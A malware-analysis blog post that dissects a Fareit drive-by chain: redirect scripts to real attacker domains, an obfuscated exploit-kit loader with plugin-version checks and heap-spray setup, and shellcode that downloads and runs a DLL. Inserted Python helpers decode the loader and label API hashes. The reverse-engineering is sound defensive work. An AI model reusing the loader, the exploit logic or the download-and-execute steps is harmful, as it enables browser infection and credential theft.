test3
Monday, 22 July 2013
Monday, 11 March 2013
[Developing Post] Fareit still steals your credentials
It started with a given link, h00p://brospecial.net/annihilates/index.html, which then goes through a couple of redirections. Here's how it goes...


To further detail, from h00p://brospecial.net/annihilates/index.html it opens with this text...

But in the background it loads three JavaScript sources.
<script type="text/javascript" src="http://www.lafabbricadelleidee.net/peppiest/comedienne.js"></script>
<script type="text/javascript" src="http://penwithian.co.uk/hyperventilate/sporran.js"></script>
<script type="text/javascript" src="http://www.kiviturizm.com/rationale/equalizing.js"></script>
h00p://www.lafabbricadelleidee.net/peppiest/comedienne.js and h00p://penwithian.co.uk/hyperventilate/sporran.js open h00p://11.lamarianella.info/read/engineering_best.php, while h00p://www.kiviturizm.com/rationale/equalizing.js opens h00p://11.laptopvspc.com/read/engineering_best.php, simply by setting the document.location object.
engineering_best.php
All the scripts point to the result of this PHP page. The content returned by this page contains self-decrypting JavaScript code.
if(document.getElementsByTagName("div")[0].style.left===""){gg="getA";}qq="q";gg+="ttri";function cxz(){r=a[gg+"bu"+"te"](i);};qaz="getElem"+"entsB"+"yTagName";zaq="pa";</script><div id="q" 12=";1ikie;095nh;94895;375...A.VERY.LONG.ENCRYPTED.DATA....46eiq"></div><script>
a=document.getElementById(qq);
e=eval;
s="";
for(i=0;;i++){
cxz();
if(r){s=s+r;}else break;
}
a=zxv=s;
s="";
p=e(zaq+"rseInt");
for(i=0;i<a.length;i+=2){
if(a["sub"+"str"](i,1)==";")continue;
if(document[qaz]("d"+"iv")[0].style.left==="")s=s+String["fromCharCode"]((p(a["sub"+"str"](i,2),27)+100)/6);
}
c=s;
e(s);
The decrypted JavaScript results in...
var PluginDetect=
{
version:"0.7.9",name:"PluginDetect",handler:function(c,b,a)
{
.... LONG PluginDetect CODE ....
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
var $$ = PluginDetect;
function x(s)
{
d=[];
for(i=0;i<s.length;i++)
{
k=(s.charCodeAt(i)).toString(33);
d.push(k);
};
return d.join(":");
}
end_redirect=function()
{
window.location.href='http://11.sephoracouponscode.com/adobe/';
};
function j1()
{
return false;
}
function j2()
{
return false;
}
function p1()
{
return false;
}
function p2()
{
return false;
}
function f1()
{
var oSpan=document.createElement("span");
document.body.appendChild(oSpan);
var url = "/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5";
oSpan.innerHTML="<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='"+url+"' /><embed src='"+url+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function getCN()
{
return "/read/engineering_best.php?airiuzz=32:1k:32:1i:1g&abi=3f:3k:34:3h:35&aedzxmmw=2v:1h:1f:33:1m:1f:2v:1k:31:2w&deb=vlwp"
}
function getBlockSize()
{
return 1024
}
function getAllocSize()
{
return 1024*1024
}
function getAllocCount()
{
return 300
}
function getFillBytes()
{
var a='%u'+'0c0c';
return a+a
}
function getShellCode()
{
var a="8282!...LONG.SHELLCODE.DATA...%1414!%".split("").reverse().join("");
return a["replace"](/%!/g,"%"+"u")
};
function ff2()
{
var oSpan=document.createElement("span");
var url="/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha";
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
document.body.appendChild(oSpan);
}
document.write('');
setTimeout(end_redirect,61000);
var pdfver=[];
function svwrbew6436b($)
{
var ar = [];
var javax = ($.getVersion("Ja"+"va")+".").toString()["split"](".");
if ($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<9)))
{
ar["push"](j2); //false
}
else if($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<6)))
{
ar["push"](j1); //false
}
pdfver=PluginDetect.getVersion("AdobeReader");
if(window.document)if(typeof pdfver=="string")
{
pdfver=pdfver["split"](".")
}
else
{
pdfver=[0,0,0,0]
}
if(pdfver[0]>0&&pdfver[0]<8)
{
if(window.document)ar["push"](p1); //false
}
if(window.document&&(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4)))
{
ar["push"](p2); //false
}
var ver = ($$.getVersion("Flash")+".").toString()["split"](".");
if (
(
(ver[0]==10&&ver[1]==0&&ver[2]>40) // >10.0.40
||
(
window.document
&&
(ver[0]==10&&ver[1]>0) // >10.0
&&
(ver[0]==10&&ver[1]<2) // <10.2
)
)
||
(
window.document
&& (
(ver[0]==10&&ver[1]==2&&ver[2]<159) // <10.2.159
||
(ver[0]==10&&ver[1]<2) // <10.2
)
)
)
{
ar["push"](ff2);
}
if(
(ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23) // <10.3.181.24
||
(ver[0]==10&&ver[1]==3&&ver[2]<181) // <10.3.181
)
{
ar["push"](f1);
}
var arcalli=0;
var arcall = function()
{
if(ar.length<=arcalli)return 123;
ss=setTimeout;
var res=ar[arcalli]();
arcalli++;
if(res&&window.document)
{
ss(function()
{
arcall()
}
,5509);
}
else
{
arcall();
}
};
arcall();
}
$$["onDetec"+"tionDone"]("Ja"+"va", svwrbew6436b, "../treating/getJavaInfo.jar");
The code above has been edited as it was being debugged.
It uses PluginDetect, a script module from http://www.pinlady.net/PluginDetect/ , a tool that can determine the currently installed versions of the operating system and selected applications such as IE, Chrome, Adobe Flash, and PDF reader. With this tool at hand, the malicious script below the PluginDetect code can select the exact exploit to execute.
However, in this specific malware script, the only application involved is Adobe Flash. If the version is within 10.0 to 10.2.159, it opens the page
/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha
. Then if the version is below 10.3.181.24, it opens
/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5
. Either of these is opened on the h00p://11.lamarianella.info or h00p://11.laptopvspc.com domain. What is expected here is that it will download SWF files, most likely exploit SWFs that would trigger the shellcode returned by the getShellCode() function. At the time of this writing the SWFs cannot be downloaded anymore.
In any event, the script still opens h00p://11.sephoracouponscode.com/adobe/ in the default browser, regardless of what PluginDetect retrieves from the system environment. This website hosts a fake Adobe update site.

The site is a complete replica of the real Adobe site and lures users into downloading adobe_flash_player.exe , a fake update that is actually malware.
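The attribute-encoded wrapper shown earlier can be decoded offline. This added Python example, not from the original post, mirrors the wrapper's loop (numerically named div attributes concatenated, the data read two characters at a time, ';' pairs skipped, every remaining pair parsed in base 27 and mapped through (n+100)/6) and adds the inverse transform plus a constructed sample; all function names here are this example's own.

```python
"""Offline decoder for the attribute-encoded JavaScript loader.

Added example, not code from the original post. It mirrors the decoding loop
of the wrapper script: the payload is spread over numerically named
attributes of a <div>, concatenated, then read two characters at a time. A
pair whose first character is ';' is junk and skipped; every other pair is a
base-27 number n and decodes to the character with code (n + 100) / 6.
"""
import re

DIGITS = "0123456789abcdefghijklmnopq"   # the 27 digits parseInt(x, 27) accepts

# Visible prefix of the encoded attribute as printed on the page (the rest was
# elided there), kept only to show what one chunk looks like.
PAGE_PREFIX = ";1ikie;095nh;94895;375"


def extract_attributes(div_html):
    """Pull numerically named name="value" attributes out of one <div> tag.

    Constructed helper for this example; a real page would go through an HTML
    parser. Returns a dict of attribute name -> value."""
    return dict(re.findall(r'\b([0-9]+)="([^"]*)"', div_html))


def join_attributes(attrs):
    """Mimic the wrapper's loop: getAttribute("0"), getAttribute("1"), ...
    until an attribute is missing, concatenating the values."""
    chunks = []
    i = 0
    while str(i) in attrs:
        chunks.append(attrs[str(i)])
        i += 1
    return "".join(chunks)


def decode_payload(data):
    """Decode the concatenated attribute data into the second-stage script."""
    out = []
    for i in range(0, len(data), 2):
        if data[i] == ";":                   # junk pair, skipped like the JS
            continue
        n = int(data[i:i + 2], 27)           # parseInt(pair, 27)
        out.append(chr((n + 100) // 6))      # fromCharCode truncates to int
    return "".join(out)


def encode_payload(text, junk_every=5):
    """Inverse transform, constructed here to build test data: character c
    becomes the two-digit base-27 number 6*c - 100, and a ';x' junk pair is
    inserted before every `junk_every`-th character."""
    out = []
    for k, ch in enumerate(text):
        if k % junk_every == 0:
            out.append(";" + DIGITS[k % 27])
        n = 6 * ord(ch) - 100
        if not 0 <= n < 27 * 27:
            raise ValueError(f"character {ch!r} is outside the encodable range")
        out.append(DIGITS[n // 27] + DIGITS[n % 27])
    return "".join(out)


if __name__ == "__main__":
    # Constructed div carrying a short encoded payload over three attributes.
    payload = encode_payload('var PluginDetect={version:"0.7.9"};')
    third = len(payload) // 3 * 2 // 2 * 2 // 2   # keep chunk boundaries even
    div = f'<div id="q" 0="{payload[:third]}" 1="{payload[third:2*third]}" 2="{payload[2*third:]}"></div>'
    print(decode_payload(join_attributes(extract_attributes(div))))
    print(decode_payload(PAGE_PREFIX))
```

Note that chunk boundaries between attributes do not matter to the decoder as long as the concatenated string is read in the same pair order the browser used.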
getShellCode()
The shellcode when converted to its binary form is 538 bytes. This code begins by decrypting, not decompressing, the rest of its code. A simple look at the decrypted dump shows a URL:

The code proceeds by locating the first link entry in the EPROCESS blocks, usually NTDLL.DLL . It then searches for the DWORD 0x0c330408b starting from the process's base address.
seg000:00000026 33 C0 xor eax, eax
seg000:00000028 64 8B 40 30 mov eax, fs:[eax+30h]
seg000:0000002C 8B 40 0C mov eax, [eax+0Ch]
seg000:0000002F 8B 70 1C mov esi, [eax+1Ch]
seg000:00000032 56 push esi
seg000:00000033 8B 76 08 mov esi, [esi+8]
seg000:00000036 33 DB xor ebx, ebx
seg000:00000038 66 8B 5E 3C mov bx, [esi+3Ch]
seg000:0000003C 03 74 33 2C add esi, [ebx+esi+2Ch]
seg000:00000040 81 EE 15 10 FF FF sub esi, 0FFFF1015h
seg000:00000046 B8 8B 40 30 C3 mov eax, 0C330408Bh
seg000:0000004B
seg000:0000004B loc_4B:
seg000:0000004B 46 inc esi
seg000:0000004C 39 06 cmp [esi], eax
seg000:0000004E 75 FB jnz short loc_4B
The DWORD value 0x0c330408b is actually equivalent to...
mov eax, [eax+30h]
retn
It uses this as a function that returns the value pointed to by eax, and uses it when retrieving API addresses from the export table of a loaded library. The APIs retrieved are:
seg000:00000189 8E 4E 0E EC dd 0EC0E4E8Eh ; LoadLibraryA
seg000:0000018D 98 FE 8A 0E dd 0E8AFE98h ; WinExec
seg000:00000191 89 6F 01 BD dd 0BD016F89h ; TerminateThread
seg000:00000195 33 CA 8A 5B dd 5B8ACA33h ; GetTempPathA
seg000:00000199 1B C6 46 79 dd 7946C61Bh ; VirtualProtect
seg000:0000019D 36 1A 2F 70 dd 702F1A36h ; URLDownloadToFileA
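The constants in the table above follow the ROR-13 export-name hash. This added Python example, not from the original post, recomputes that hash over a constructed wordlist of candidate export names so the constants can be labelled without executing the shellcode; the wordlist and the function names are this example's own.

```python
"""Label the API hash constants stored in the shellcode's table.

Added example, not code from the original post. Each constant is the
"ror 13" hash of an export name: for every byte of the name, rotate the
running 32-bit value right by 13 bits and add the byte. Hashing a wordlist of
export names and looking the constants up recovers the API names statically.
"""

MASK = 0xFFFFFFFF


def ror13_hash(name):
    """32-bit ROR-13 hash of an export name (the terminating NUL is not hashed)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK   # ror eax, 13
        h = (h + b) & MASK                   # add eax, byte
    return h


def build_hash_table(names):
    """Map hash -> export name for a wordlist of candidate API names."""
    return {ror13_hash(n): n for n in names}


def label_hashes(hashes, table):
    """Return (hash, name or None) pairs in the order the shellcode stores them."""
    return [(h, table.get(h)) for h in hashes]


# Hash constants exactly as they appear in the shellcode's table on this page.
SHELLCODE_HASHES = [0xEC0E4E8E, 0x0E8AFE98, 0xBD016F89, 0x5B8ACA33,
                    0x7946C61B, 0x702F1A36]

# Constructed wordlist: a few exports an analyst would try first.
CANDIDATE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "WinExec", "ExitProcess",
    "TerminateThread", "GetTempPathA", "VirtualProtect", "VirtualAlloc",
    "URLDownloadToFileA", "CreateFileA", "WriteFile", "ExitThread",
]

if __name__ == "__main__":
    table = build_hash_table(CANDIDATE_EXPORTS)
    for h, name in label_hashes(SHELLCODE_HASHES, table):
        print(f"0x{h:08X}  {name or '<unknown>'}")
```

A larger wordlist (every export of kernel32, urlmon and friends) turns this into a generic hash-labelling pass for any shellcode that uses the same scheme.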
And the final step it does is to download and execute a DLL file.
seg000:0000014C 6A 00 push 0
seg000:0000014E 6A 00 push 0
seg000:00000150 53 push ebx ; C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll
seg000:00000151 57 push edi ; "http://11.lamarianella.info/read/engineering_best.php?kf=32:1k:32:1i:1g&ue=2v:1h:1f:33:1m:1f:2v:1k:31:2w&v=1k&jb=z&ey=j"
seg000:00000152 6A 00 push 0
seg000:00000154 FF 56 14 call dword ptr [esi+14h] ; URLDownloadToFileA
seg000:00000157 85 C0 test eax, eax
seg000:00000159 75 16 jnz short notdownloaded
seg000:0000015B 6A 00 push 0
seg000:0000015D 53 push ebx ; C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll
seg000:0000015E FF 56 04 call dword ptr [esi+4] ; WinExec
seg000:00000161 6A 00 push 0
seg000:00000163 83 EB 0C sub ebx, 0Ch
seg000:00000166 53 push ebx ; regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll
seg000:00000167 FF 56 04 call dword ptr [esi+4] ; WinExec
As of this writing, the URL that serves wpbt0.dll no longer exists.
adobe_flash_player.exe
The first thing it does is verify that the IOleContainer COM interface exists. This malware requires this interface to be able to use global streams later. It does this by checking for the existence of this registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000011b-0000-0000-c000-000000000046}
It also checks this key for its marker:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000011b-0000-0000-c000-000000000046}\11
This registry key serves as a placeholder where it could possibly store malware information later.
This malware allocates a memory region of 0x019000 bytes, then decrypts a large block of data into it. Afterwards it passes control directly to the decrypted code. Here's how it passes control:
.text:0040180D mov ecx, ALLOCATED_MEM_BASE
.text:00401813 add ecx, 17AD0h
.text:00401819 mov NEW_EIP, ecx
.text:0040181F mov eax, eax
.text:00401821 mov eax, eax
.text:00401823 mov eax, eax
.text:00401825 popa
.text:00401826 mov eax, eax
.text:00401828 mov eax, eax
.text:0040182A mov eax, eax
.text:0040182C mov eax, eax
.text:0040182E push 368282h
.text:00401833 mov eax, [ebp+offset_CALL_EAX_FUNC]
.text:00401836 mov eax, eax
.text:00401838 mov eax, eax
.text:0040183A mov ecx, esp ; Replace TOS
.text:0040183C push edx
.text:0040183D mov edx, ecx
.text:0040183F sub edx, 26h
.text:00401842 mov ecx, edx
.text:00401844 pop edx
.text:00401845 add ecx, 22h
.text:00401848 mov eax, eax
.text:0040184A mov eax, eax
.text:0040184C mov eax, eax
.text:0040184E mov dword ptr [ecx+4], 0 ; Clear TOS
.text:00401855 mov eax, eax
.text:00401857 mov eax, eax
.text:00401859 mov eax, eax
.text:0040185B add [ecx+4], eax ; Set TOS with value of EAX
.text:0040185E mov eax, eax
.text:00401860 retn
Then after retn ...
.text:00401490 CALL_EAX_FUNC proc near ; CODE XREF: sub_4014C0+13C p
.text:00401490 ; sub_4014C0+156 p
.text:00401490 ; DATA XREF: sub_4014C0+C o
.text:00401490 ; sub_4014C0+2CF o
.text:00401490 push ebp
.text:00401491 mov ebp, esp
.text:00401493 mov eax, eax
.text:00401495 mov eax, eax
.text:00401497 mov eax, eax
.text:00401499 mov esp, EXECUTE_ADDRESS_1_ESP
.text:0040149F mov eax, eax
.text:004014A1 mov eax, eax
.text:004014A3 mov eax, eax
.text:004014A5 add esp, 4
.text:004014A8 mov eax, eax
.text:004014AA mov eax, eax
.text:004014AC mov eax, eax
.text:004014AE mov eax, NEW_EIP
.text:004014B3 mov eax, eax
.text:004014B5 mov eax, eax
.text:004014B7 push eax
.text:004014B8 retn
.text:004014B8 CALL_EAX_FUNC endp
Beam us up to memory space, Scottie!
Now in the virtually allocated space, execution continues by allocating another region with HeapAlloc . It decrypts more data into this new region, and the decrypted data turns out to be a PE file. Using the import table information from this new PE's header, it loads all the required libraries and the APIs it will use.
It also calls UnmapViewOfFile with the current running process as its parameter.
seg000:002978C5 68 14 03 28 00 push offset aUnmapviewoffil ; "UnmapViewOfFile"
seg000:002978CA A1 48 7D 29 00 mov eax, ds:hKernelProcess
seg000:002978CF 50 push eax
seg000:002978D0 E8 4B FB FF FF call _GetProcAddress
seg000:002978D5 83 C4 08 add esp, 8
seg000:002978D8 89 45 DC mov [ebp+var_24], eax
seg000:002978DB 83 3D 44 7D 29 00 00 cmp ds:bSUCCESS, 0
seg000:002978E2 75 0A jnz short loc_2978EE
seg000:002978E4 8B 0D 3C 7D 29 00 mov ecx, ds:hThisProcess ; our calling process PE at base 0x400000
seg000:002978EA 51 push ecx
seg000:002978EB FF 55 DC call [ebp+var_24] ; UnmapViewOfFile
This is a form of anti-dumping technique. Every file that is executed has a mapped view in the process space. It can also be unmapped, which also happens when a process is terminating. Here's a description from Microsoft (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366882(v=vs.85).aspx):
Unmapping a mapped view of a file invalidates the range occupied by the view in the address space of the process and makes the range available for other allocations. It removes the working set entry for each unmapped virtual page that was part of the working set of the process and reduces the working set size of the process. It also decrements the share count of the corresponding physical page.
Since the original malware process has already transferred control to the allocated memory space, it can successfully unmap its own image. Unmapping also means clearing and freeing up that part of the process space, so nothing can be dumped from that area. But in this case the malware only removed the mapping; references to that range still exist in the Process Environment Block (PEB).
What happens next is a call to VirtualAlloc requesting the base address stated in the header of the newly decrypted PE file. Since the base address here is 0x0400000, the same as that of the unmapped process image, the memory allocation succeeds.
seg000:002978F7 6A 40 push 40h
seg000:002978F9 68 00 30 00 00 push 3000h
seg000:002978FE 8B 55 FC mov edx, [ebp+var_4]
seg000:00297901 52 push edx
seg000:00297902 8B 45 E0 mov eax, [ebp+var_20]
seg000:00297905 8B 48 34 mov ecx, [eax+34h]
seg000:00297908 51 push ecx
seg000:00297909 FF 55 F0 call [ebp+VirtualAllocAddress] ; Results creating base 400000
It then copies the decrypted PE into the newly allocated process space, mapping the PE file according to the information in its section headers.
seg000:0029784B 8B 45 F4 mov eax, [ebp+var_C]
seg000:0029784E 83 C0 01 add eax, 1
seg000:00297851 89 45 F4 mov [ebp+var_C], eax
seg000:00297854 loc_297854:
seg000:00297854 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297857 0F B7 51 06 movzx edx, word ptr [ecx+6]
seg000:0029785B 39 55 F4 cmp [ebp+var_C], edx
seg000:0029785E 73 59 jnb short loc_2978B9
seg000:00297860 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297863 83 78 14 00 cmp dword ptr [eax+14h], 0
seg000:00297867 74 45 jz short loc_2978AE
seg000:00297869 8B 4D E8 mov ecx, [ebp+var_18]
seg000:0029786C 83 79 10 00 cmp dword ptr [ecx+10h], 0
seg000:00297870 74 3C jz short loc_2978AE
seg000:00297872 8B 55 E8 mov edx, [ebp+var_18]
seg000:00297875 8B 42 10 mov eax, [edx+10h]
seg000:00297878 8B 4D E0 mov ecx, [ebp+var_20]
seg000:0029787B 8B 51 3C mov edx, [ecx+3Ch]
seg000:0029787E 8D 44 10 FF lea eax, [eax+edx-1]
seg000:00297882 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297885 33 D2 xor edx, edx
seg000:00297887 F7 71 3C div dword ptr [ecx+3Ch]
seg000:0029788A 8B 55 E0 mov edx, [ebp+var_20]
seg000:0029788D 0F AF 42 3C imul eax, [edx+3Ch]
seg000:00297891 50 push eax
seg000:00297892 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297895 8B 4D 08 mov ecx, [ebp+arg_0]
seg000:00297898 03 48 14 add ecx, [eax+14h]
seg000:0029789B 51 push ecx
seg000:0029789C 8B 55 E8 mov edx, [ebp+var_18]
seg000:0029789F 8B 45 E4 mov eax, [ebp+var_1C]
seg000:002978A2 03 42 0C add eax, [edx+0Ch]
seg000:002978A5 50 push eax
seg000:002978A6 E8 15 FE FF FF call _memcpy
seg000:002978AB 83 C4 0C add esp, 0Ch
seg000:002978AE loc_2978AE:
seg000:002978AE 8B 4D E8 mov ecx, [ebp+var_18]
seg000:002978B1 83 C1 28 add ecx, 28h
seg000:002978B4 89 4D E8 mov [ebp+var_18], ecx
seg000:002978B7 EB 92 jmp short loc_29784B
Once the copy is done, it patches the PEB with the new PE entry point and image base:
seg000:00297726 A1 5C 7D 29 00 mov eax, ds:_TIB
seg000:0029772B 8B D2 mov edx, edx
seg000:0029772D 33 C9 xor ecx, ecx
seg000:0029772F db 3Eh
seg000:0029772F 3E 8B 40 30 mov eax, [eax+30h]
seg000:00297733 8B D2 mov edx, edx
seg000:00297735 8B D2 mov edx, edx
seg000:00297737 db 3Eh
seg000:00297737 3E 8B 48 0C mov ecx, [eax+0Ch]
seg000:0029773B 8B D2 mov edx, edx
seg000:0029773D 89 4D F4 mov [ebp+var_C], ecx
seg000:00297740 8B 45 F4 mov eax, [ebp+var_C]
seg000:00297743 8B 48 0C mov ecx, [eax+0Ch] ; +0x00c InLoadOrderModuleList
seg000:00297746 89 4D F8 mov [ebp+var_8], ecx
seg000:00297749 8B 55 F8 mov edx, [ebp+var_8]
seg000:0029774C 89 55 FC mov [ebp+var_4], edx
seg000:0029774F
seg000:0029774F loc_29774F:
seg000:0029774F B8 01 00 00 00 mov eax, 1
seg000:00297754 85 C0 test eax, eax
seg000:00297756 74 44 jz short loc_29779C
seg000:00297758 83 7D F8 00 cmp [ebp+var_8], 0
seg000:0029775C 75 04 jnz short loc_297762
seg000:0029775E 33 C0 xor eax, eax
seg000:00297760 EB 3C jmp short loc_29779E
seg000:00297762 loc_297762:
seg000:00297762 8B 4D F8 mov ecx, [ebp+var_8]
seg000:00297765 8B 51 18 mov edx, [ecx+18h] ; Base Address
seg000:00297768 3B 55 08 cmp edx, [ebp+arg_0]
seg000:0029776B 75 19 jnz short loc_297786
seg000:0029776D 8B 45 F8 mov eax, [ebp+var_8]
seg000:00297770 8B 4D 0C mov ecx, [ebp+arg_4]
seg000:00297773 89 48 1C mov [eax+1Ch], ecx ; Entry Point
seg000:00297776 8B 55 F8 mov edx, [ebp+var_8]
seg000:00297779 8B 45 10 mov eax, [ebp+arg_8]
seg000:0029777C 89 42 18 mov [edx+18h], eax ; Base Address
The decrypted PE's entry point code also needs to be patched to work properly:
seg000:00297700 sub_297700 proc near
seg000:00297700 55 push ebp
seg000:00297701 8B EC mov ebp, esp
seg000:00297703 A1 68 7D 29 00 mov eax, ds:DecryptedPEEntryPoint
seg000:00297708 C6 00 68 mov byte ptr [eax], 68h
seg000:0029770B 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297711 89 50 01 mov [eax+1], edx
seg000:00297714 B2 C3 mov dl, 0C3h
seg000:00297716 88 50 05 mov [eax+5], dl
seg000:00297719 5D pop ebp
seg000:0029771A C3 retn
seg000:0029771A sub_297700 endp
At this point only the entry point and the image base in the PEB have been updated; the original file name and path were not touched at all. A black-box dump of the process memory would appear to be a different file from the one originally executed.
And another code control transfer:
seg000:00297CF1 E8 8A FD FF FF call Garbage
seg000:00297CF6 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297CFC 52 push edx ; Run New program
seg000:00297CFD C3 retn
What just happened is that the malware's PE process was totally replaced by a new PE.
And now, the real malware behavior begins.
A whole new process
The main code routines of the malware...
- Initiate some stuff and set privileges
- An anti-emulation
- Steal credentials and send em'
- Download and execute more files
- Steal more... Windows credentials
- Send em'
- Delete self
The malware retrieves its required APIs from these libraries...
.text:00402530 push offset StgOpenStorage ; int
.text:00402535 push offset aOle32_dll_0 ; "ole32.dll"
.text:0040253A call sub_4024D6
.text:0040253F push offset CryptUnprotectData ; int
.text:00402544 push offset aCrypt32_dll ; "crypt32.dll"
.text:00402549 call sub_4024D6
.text:0040254E push offset AllocateAndInitializeSid ; int
.text:00402553 push offset aAdvapi32_dll_0 ; "advapi32.dll"
.text:00402558 call sub_4024D6
.text:0040255D push offset SHGetFolderPathA ; int
.text:00402562 push offset aShell32_dll_1 ; "shell32.dll"
.text:00402567 call sub_4024D6
.text:0040256C push offset NetApiBufferFree ; int
.text:00402571 push offset aNetapi32_dll ; "netapi32.dll"
.text:00402576 call sub_4024D6
.text:0040257B push offset WTSGetActiveConsoleSessionId ; int
.text:00402580 push offset aKernel32_dll_1 ; "kernel32.dll"
.text:00402585 call sub_4024D6
.text:0040258A push offset MsiGetComponentPathA ; int
.text:0040258F push offset aMsi_dll ; "msi.dll"
.text:00402594 call sub_4024D6
.text:00402599 push offset PStoreCreateInstance ; int
.text:0040259E push offset aPstorec_dll ; "pstorec.dll"
.text:004025A3 call sub_4024D6
.text:004025A8 push offset CreateEnvironmentBlock ; int
.text:004025AD push offset aUserenv_dll_0 ; "userenv.dll"
.text:004025B2 call sub_4024D6
.text:004025B7 retn
Notice that it loads ole32.dll, as expected from the IOleContainer check in the registry; it uses this library to push messages and data to a global stream. You can expect that this malware will be using streams to push and pull data.
Next is an anti-emulation technique. Emulators usually simulate the sequence of instructions, but they have limits. This particular looping technique is commonly employed by different malware families. What it does is try to exceed the instruction-count limits of emulators.
.text:0040FAD2 mov ecx, ecx
.text:0040FAD4 push 123EA83h ; loop counter
.text:0040FAD9 mov ecx, ecx
.text:0040FADB pop [ebp+var_4]
.text:0040FADE mov edx, eax
.text:0040FAE0 jmp short loc_40FB06
.text:0040FAE2 loc_40FAE2:
.text:0040FAE2 mov edx, eax
.text:0040FAE4 mov ecx, ecx
.text:0040FAE6 add eax, esi
.text:0040FAE8 mov edx, eax
.text:0040FAEA mov ecx, ecx
.text:0040FAEC push eax
.text:0040FAED mov ecx, ecx
.text:0040FAEF mov edx, eax
.text:0040FAF1 call GetTickCount
.text:0040FAF6 mov ecx, ecx
.text:0040FAF8 pop eax
.text:0040FAF9 mov edx, eax
.text:0040FAFB mov ecx, ecx
.text:0040FAFD add eax, edx
.text:0040FAFF mov ecx, ecx
.text:0040FB01 mov edx, eax
.text:0040FB03 dec [ebp+var_4]
.text:0040FB06 loc_40FB06:
.text:0040FB06 cmp [ebp+var_4], 0
.text:0040FB0A jnz short loc_40FAE2
A good emulator should be intelligent enough to skip or mimic this kind of code.
It then adjusts the privilege level of the malware so it can act as if it has administrative privileges.
.text:004029AC push eax ; lpLuid
.text:004029AD push [ebp+lpName] ; lpName - "SeImpersonatePrivilege"
.text:004029B0 push 0 ; lpSystemName
.text:004029B2 call LookupPrivilegeValueA
.text:004029B8 or eax, eax
.text:004029BA jz short loc_402A17
.text:004029BC call GetCurrentProcess
.text:004029C1 mov edx, eax
.text:004029C3 lea eax, [ebp+hObject]
.text:004029C6 push eax ; TokenHandle
.text:004029C7 push TOKEN_ADJUST_PRIVILEGES ; DesiredAccess
.text:004029C9 push edx ; ProcessHandle
.text:004029CA call OpenProcessToken
.text:004029D0 or eax, eax
.text:004029D2 jz short loc_4029FD
.text:004029D4 mov [ebp+NewState.PrivilegeCount], 1
.text:004029DB push [ebp+Luid.LowPart]
.text:004029DE pop [ebp+NewState.Privileges.Luid.LowPart]
.text:004029E1 push [ebp+Luid.HighPart]
.text:004029E4 pop [ebp+NewState.Privileges.Luid.HighPart]
.text:004029E7 cmp [ebp+arg_4], 0
.text:004029EB jz short loc_4029F6
.text:004029ED mov [ebp+NewState.Privileges.Attributes], SE_PRIVILEGE_ENABLED
.text:004029F4 jmp short loc_4029FD
.text:004029F6 loc_4029F6:
.text:004029F6 mov [ebp+NewState.Privileges.Attributes], 0
.text:004029FD loc_4029FD:
.text:004029FD ; sub_402977+7D j
.text:004029FD push 0 ; ReturnLength
.text:004029FF push 0 ; PreviousState
.text:00402A01 push 10h ; BufferLength
.text:00402A03 lea eax, [ebp+NewState]
.text:00402A06 push eax ; NewState
.text:00402A07 push 0 ; DisableAllPrivileges
.text:00402A09 push [ebp+hObject] ; TokenHandle
.text:00402A0C call AdjustTokenPrivileges
.text:00402A12 or eax, eax
.text:00402A14 jz short loc_402A17
.text:00402A16 inc ebx
.text:00402A17 loc_402A17:
.text:00402A17 cmp [ebp+hObject], 0
.text:00402A1B jz short loc_402A25
.text:00402A1D push [ebp+hObject] ; hObject
.text:00402A20 call CloseHandle
The privilege level is set to SeImpersonatePrivilege to permit the malware program
Saturday, 2 March 2013
Breaking MSVBVM60.DLL
